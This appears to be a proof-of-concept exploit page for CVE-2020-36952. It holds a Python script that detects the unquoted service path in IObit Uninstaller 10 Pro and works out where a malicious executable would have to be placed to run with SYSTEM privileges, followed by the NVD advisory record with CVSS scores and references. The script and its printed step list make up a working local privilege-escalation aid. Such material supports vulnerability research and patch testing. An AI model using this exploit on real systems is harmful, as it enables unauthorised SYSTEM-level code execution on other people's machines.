CVE-2020-36952

#!/usr/bin/env python3 """ CVE-2020-36952 PoC - IObit Uninstaller 10 Pro Unquoted Service Path This PoC demonstrates how to exploit the unquoted service path vulnerability to escalate privileges to SYSTEM level. Note: This is for educational and authorized testing purposes only. """ import os import subprocess import sys def check_service_path(): """Check if the IObit Uninstaller service has an unquoted path with spaces""" try: # Query the service configuration using sc command result = subprocess.run( ['sc', 'qc', 'IObitUninstallerSvc'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: print("[*] IObit Uninstaller Service found") for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f"[*] Service path: {path}") # Check if path contains spaces and is not quoted if ' ' in path and not path.startswith('"'): print("[!] VULNERABLE: Unquoted path with spaces detected!") return True, path return False, None except Exception as e: print(f"[-] Error checking service: {e}") return False, None def exploit_unquoted_path(service_path): """ Exploit the unquoted service path by creating a malicious executable in the intermediate directory path. """ # Extract path components path_parts = service_path.strip('"').split('\\') # Find the first directory with space in its name exploit_dir = None for i, part in enumerate(path_parts[:-1]): if ' ' in part: exploit_dir = '\\'.join(path_parts[:i+1]) malicious_exe = os.path.join(exploit_dir, path_parts[i+1].split()[0] + '.exe') break if not exploit_dir: print("[-] No exploitable path component found") return False print(f"[*] Exploit directory: {exploit_dir}") print(f"[*] Malicious executable should be placed at: {malicious_exe}") print(f"[!] When service restarts, it will execute the malicious file with SYSTEM privileges") return True def main(): print("=" * 60) print("CVE-2020-36952 - IObit Uninstaller Unquoted Service Path") print("=" * 60) vulnerable, path = check_service_path() if vulnerable: print("\n[!] Target is VULNERABLE to CVE-2020-36952") exploit_unquoted_path(path) print("\n[*] To exploit:") print(" 1. Create a malicious executable") print(" 2. Place it in the exploit directory") print(" 3. Wait for service restart or reboot") else: print("\n[-] Target does not appear to be vulnerable") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2020-36952", "sourceIdentifier": "[email protected]", "published": "2026-01-26T16:15:54.690", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "IObit Uninstaller 10 Pro contains an unquoted service path vulnerability that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted service path in the IObit Uninstaller Service to insert malicious code that would execute with SYSTEM-level permissions during service startup."}, {"lang": "es", "value": "IObit Uninstaller 10 Pro contiene una vulnerabilidad de ruta de servicio sin comillas que permite a usuarios locales ejecutar código potencialmente con privilegios de sistema elevados. Los atacantes pueden explotar la ruta de servicio sin comillas en el Servicio de IObit Uninstaller para insertar código malicioso que se ejecutaría con permisos de nivel SYSTEM durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49371", "source": "[email protected]"}, {"url": "https://www.iobit.com", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/iobit-uninstaller-pro-unquoted-service-path", "source": "[email protected]"}]}}